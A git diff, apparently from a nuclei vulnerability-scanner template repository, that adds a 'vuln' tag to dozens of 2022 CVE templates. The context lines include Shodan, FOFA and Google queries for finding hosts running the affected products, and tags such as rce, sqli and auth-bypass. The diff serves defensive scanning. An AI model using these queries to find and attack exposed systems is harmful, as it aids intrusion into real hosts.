a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"login" "x-oracle-dms-ecid" 200 fofa-query: title="login" "x-oracle-dms-ecid" 200 google-query: intitle:"login" "x-oracle-dms-ecid" 200 - tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm,vkev + tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 9a8e1b71e8a..49bb893337d 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -31,7 +31,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:wordpress:wordpress" - http.component:"wordpress" - tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress,vkev + tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-2168.yaml b/http/cves/2022/CVE-2022-2168.yaml index 89bdfa24442..93243f9fc17 100644 --- a/http/cves/2022/CVE-2022-2168.yaml +++ b/http/cves/2022/CVE-2022-2168.yaml @@ -27,7 +27,7 @@ info: fofa-query: body="wp-content/plugins/download-manager/" google-query: inurl:"/wp-content/plugins/download-manager/" shodan-query: html:"wp-content/plugins/download-manager/" - tags: cve,cve2022,wp,wordpress,wp-plugin,xss,download-manager,authenticated + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,download-manager,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 46eebd511c1..86ab03479ad 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -28,7 +28,7 @@ info: max-request: 5 vendor: octobercms product: october - tags: cve2022,cve,authenticated,rce,cms,octobercms,injection + tags: cve2022,cve,authenticated,rce,cms,octobercms,injection,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 99e48943419..9b143216f03 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -31,7 +31,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,huntr,microweber,xss,unauth + tags: cve,cve2022,huntr,microweber,xss,unauth,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index b13b6ab362d..ef7bafbb478 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -33,7 +33,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve,cve2022,gitlab + tags: cve,cve2022,gitlab,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 0c6a7d88e73..d7065d3c000 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -29,7 +29,7 @@ info: vendor: contact_form_7_captcha_project product: contact_form_7_captcha framework: wordpress - tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project + tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index e1c51a257d7..cac5e313c30 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -27,7 +27,7 @@ info: vendor: brizy product: unyson framework: wordpress - tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy + tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 0a3c675793b..530d5c61af7 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -34,7 +34,7 @@ info: - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" - tags: cve2022,cve,xss,juniper,junos,vkev + tags: cve2022,cve,xss,juniper,junos,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index 8b342e1474a..a38720c372d 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -29,7 +29,7 @@ info: product: content_server shodan-query: http.favicon.hash:-266008933 fofa-query: icon_hash=-266008933 - tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev,vkev + tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index bc6acbf9910..57e87de4982 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -31,7 +31,7 @@ info: product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 fofa-query: icon_hash=816588900 - tags: cve2022,cve,exposure,sharingsphere,apache + tags: cve2022,cve,exposure,sharingsphere,apache,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 68c19da6f11..f7e06d49aed 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -31,7 +31,7 @@ info: shodan-query: - "http.component:\"Prestashop\"" - http.component:"prestashop" - tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme,vkev + tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index c97c0fc769a..ce5e93b5a63 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -33,7 +33,7 @@ info: - http.title:"trilium notes" fofa-query: title="trilium notes" google-query: intitle:"trilium notes" - tags: cve,cve2022,xss,trilium,huntr,trilium_project + tags: cve,cve2022,xss,trilium,huntr,trilium_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index 7b2c139a55b..8f5bfcc9c89 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: vmware product: spring_cloud_gateway - tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev,vkev + tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index f287e1b99ab..55eea3461a9 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -31,7 +31,7 @@ info: fofa-query: - icon_hash=-1250474341 - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" - tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti,vkev + tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-22956.yaml b/http/cves/2022/CVE-2022-22956.yaml index d63859a0862..8752db53cf3 100644 --- a/http/cves/2022/CVE-2022-22956.yaml +++ b/http/cves/2022/CVE-2022-22956.yaml @@ -30,7 +30,7 @@ info: product: identity_manager shodan-query: http.favicon.hash:"-1250474341" fofa-query: icon_hash=-1250474341 - tags: cve,cve2022,vmware,workspace,auth-bypass,vkev + tags: cve,cve2022,vmware,workspace,auth-bypass,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 78cdcdc8d16..fcab732bc56 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_function - tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware,vkev + tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index 815a0129cdf..7720a63a1b4 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -28,7 +28,7 @@ info: max-request: 4 vendor: vmware product: spring_framework - tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware,vkev + tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 0fd2b033821..6703eed40e4 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -33,7 +33,7 @@ info: - app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - icon_hash=-1250474341 - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" - tags: cve2022,cve,vmware,auth-bypass,oast + tags: cve2022,cve,vmware,auth-bypass,oast,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 54f13370044..fcceac5fae0 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -33,7 +33,7 @@ info: - http.title:"logon - sinema remote connect" fofa-query: title="logon - sinema remote connect" google-query: intitle:"logon - sinema remote connect" - tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens + tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index df4f5d79572..1dedfe5fd62 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -36,7 +36,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev,vkev + tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 3aa8f3799e7..b3b9aa94caa 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -36,7 +36,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: cve,cve2022,zabbix,auth-bypass,kev,vkev + tags: cve,cve2022,zabbix,auth-bypass,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index f8e6f5194e3..c7d35620fb6 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -29,7 +29,7 @@ info: vendor: vr_calendar_project product: vr_calendar framework: wordpress - tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project,vkev + tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index d966286e749..25a928a036e 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: crestron product: hd-md4x2-4k-e_firmware - tags: cve,cve2022,crestron,disclosure,vkev + tags: cve,cve2022,crestron,disclosure,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 2bf0440739e..1d8de745a67 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -32,7 +32,7 @@ info: - http.html:"BigAnt" - http.html:"bigant" fofa-query: body="bigant" - tags: cve,cve2022,bigant,lfi,bigantsoft,vkev + tags: cve,cve2022,bigant,lfi,bigantsoft,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index 43dd51a99f0..f27be6aae7e 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -29,7 +29,7 @@ info: product: bigant_server shodan-query: http.html:"bigant" fofa-query: body="bigant" - tags: cve,cve2022,bigant,unauth,exposure,bigantsoft + tags: cve,cve2022,bigant,unauth,exposure,bigantsoft,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-23397.yaml b/http/cves/2022/CVE-2022-23397.yaml index 25bdfee645d..d04c3936e3a 100644 --- a/http/cves/2022/CVE-2022-23397.yaml +++ b/http/cves/2022/CVE-2022-23397.yaml @@ -24,7 +24,7 @@ info: product: ez-net_portal shodan-query: "EZNET_" fofa-query: "EZNET_" - tags: cve,cve2022,cedar,eznet,xss,vkev + tags: cve,cve2022,cedar,eznet,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index cfe9459955e..107a97067fa 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -35,7 +35,7 @@ info: - title="MeterSphere" - body="metersphere" - title="metersphere" - tags: cve2022,cve,metersphere,ssrf,oast,xss + tags: cve2022,cve,metersphere,ssrf,oast,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index 91ba1d6a59a..ffcd960f829 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -30,7 +30,7 @@ info: vendor: nsqua product: simply_schedule_appointments framework: wordpress - tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua + tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index f178e63f908..0d9af674355 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -27,7 +27,7 @@ info: vendor: wpwax product: directorist framework: wordpress - tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax,vkev + tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 15664dedaf0..58f2a1ded6f 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -33,7 +33,7 @@ info: - title="manageengine desktop central 10" - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" - tags: cve,cve2022,zoho,exposure,zohocorp + tags: cve,cve2022,zoho,exposure,zohocorp,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 13b18406878..67d6f9d0d37 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -30,7 +30,7 @@ info: vendor: easy_student_results_project product: easy_student_results framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project + tags: cve,cve2022,wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,easy_student_results_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index d3314f2e1a0..93cb8885aed 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -37,7 +37,7 @@ info: - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2022,phpmyadmin,xss + tags: cve,cve2022,phpmyadmin,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index 7aa55e64047..dc2712a99a6 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -30,7 +30,7 @@ info: vendor: slickremix product: "feed_them_social" framework: wordpress - tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix,vkev + tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 9ce27d0b309..f185af2d5b0 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -33,7 +33,7 @@ info: - http.html:"InTouch Access Anywhere" - http.html:"intouch access anywhere" fofa-query: body="intouch access anywhere" - tags: cve,cve2022,lfi,packetstorm,aveva,intouch + tags: cve,cve2022,lfi,packetstorm,aveva,intouch,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index 5251ea3e6d0..e3b2d1da09a 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zzzcms product: zzzphp - tags: cve,cve2022,rce,zzzphp,zzzcms + tags: cve,cve2022,rce,zzzphp,zzzcms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 94ff79b1700..97050778f9f 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -31,7 +31,7 @@ info: - http.favicon.hash:1464851260 - http.favicon.hash:"1464851260" fofa-query: icon_hash="1464851260" - tags: cve,cve2022,sqli,mcms,mingsoft + tags: cve,cve2022,sqli,mcms,mingsoft,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index 4ad14dd6ef0..9880429c0da 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: shenyu - tags: cve,cve2022,shenyu,unauth,apache + tags: cve,cve2022,shenyu,unauth,apache,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index 09c79539e69..6306a2c811b 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -33,7 +33,7 @@ info: - title="Apache APISIX Dashboard" - title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" - tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev + tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 189703da6d9..49d51c64f28 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -32,7 +32,7 @@ info: - http.title:"casdoor" fofa-query: title="casdoor" google-query: intitle:"casdoor" - tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin + tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index 029096aad4b..49fe0e053c2 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -28,7 +28,7 @@ info: vendor: shibboleth product: oidc_op framework: identity_provider - tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider + tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 25ed615c1c5..df0542dca76 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -35,7 +35,7 @@ info: - title="identity management" - title="identity management" html:"freeipa" google-query: intitle:"identity management" html:"freeipa" - tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki,vkev + tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index 998fe2deda1..2e584e804d9 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -30,7 +30,7 @@ info: vendor: public_knowledge_project product: open_journal_systems shodan-query: cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems" - tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project + tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 48df2934a7f..ec2008a666b 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: time-based-sqli,cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft + tags: time-based-sqli,cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 9b63126270d..7d1495fe211 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -32,7 +32,7 @@ info: - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" - tags: cve,cve2022,voipmonitor,sqli,unauth,vkev + tags: cve,cve2022,voipmonitor,sqli,unauth,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index 01656d275e0..4943bedbb58 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms,vuln variables: num: '999999999' diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 9d2ba121c09..70f4be7a49e 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: time-based-sqli,cve2022,cve,sqli,cuppa,authenticated,cuppacms + tags: time-based-sqli,cve2022,cve,sqli,cuppa,authenticated,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index bc861f883da..fdf3cf0d0ce 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index b2e411d5d34..e05f2afb729 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve,cve2022,airflow,rce,apache,vkev + tags: cve,cve2022,airflow,rce,apache,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index e294d2d4094..5bcb0251174 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -28,7 +28,7 @@ info: product: smartertrack shodan-query: http.favicon.hash:1410071322 fofa-query: icon_hash=1410071322 - tags: cve,cve2022,xss,smartertrack,smartertools + tags: cve,cve2022,xss,smartertrack,smartertools,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-2461.yaml b/http/cves/2022/CVE-2022-2461.yaml index 5854d428571..7cde6405b29 100644 --- a/http/cves/2022/CVE-2022-2461.yaml +++ b/http/cves/2022/CVE-2022-2461.yaml @@ -27,7 +27,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/" fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/" - tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev + tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev,vuln variables: redirect_uri: "oast.me" diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 857eb9d1b49..b0d826d1b47 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -29,7 +29,7 @@ info: vendor: transposh product: transposh_wordpress_translation framework: wordpress - tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss + tags: cve,cve2022,wordpress,disclosure,wp-plugin,packetstorm,transposh,xss,vuln http: - method: POST diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 0c7a68a0ea2..c7f6ac795f0 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -28,7 +28,7 @@ info: - http.title:"audiocodes" fofa-query: title="audiocodes" google-query: intitle:"audiocodes" - tags: cve,cve2022,seclists,sqli,audiocodes + tags: cve,cve2022,seclists,sqli,audiocodes,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-24637.yaml b/http/cves/2022/CVE-2022-24637.yaml index 6866475947c..9c34d57cd0f 100644 --- a/http/cves/2022/CVE-2022-24637.yaml +++ b/http/cves/2022/CVE-2022-24637.yaml @@ -26,7 +26,7 @@ info: vendor: openwebanalytics product: open_web_analytics shodan-query: cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics" - tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics + tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics,vuln variables: password: "{{randbase(8)}}@123!" diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 592609236ff..b864f59763b 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: garage_management_system_project product: garage_management_system - tags: time-based-sqli,cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project + tags: time-based-sqli,cve,cve2022,sourcecodester,garagemanagementsystem,sqli,garage_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index a7e86e4951f..5931f308856 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"adselfservice plus" - intitle:"manageengine" - tags: cve,cve2022,manageengine,xss,authenticated,zohocorp,passive + tags: cve,cve2022,manageengine,xss,authenticated,zohocorp,passive,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-24682.yaml b/http/cves/2022/CVE-2022-24682.yaml index 23112090c16..075a7ba0361 100644 --- a/http/cves/2022/CVE-2022-24682.yaml +++ b/http/cves/2022/CVE-2022-24682.yaml @@ -24,7 +24,7 @@ info: - http.favicon.hash:"1624375939" - http.html:"Zimbra Collaboration Suite Web Client" fofa-query: icon_hash="1624375939" - tags: cve,cve2022,zimbra,collaboration,xss,kev,passive,vkev + tags: cve,cve2022,zimbra,collaboration,xss,kev,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 1c5c2b4d1c5..9945f4d7e81 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ 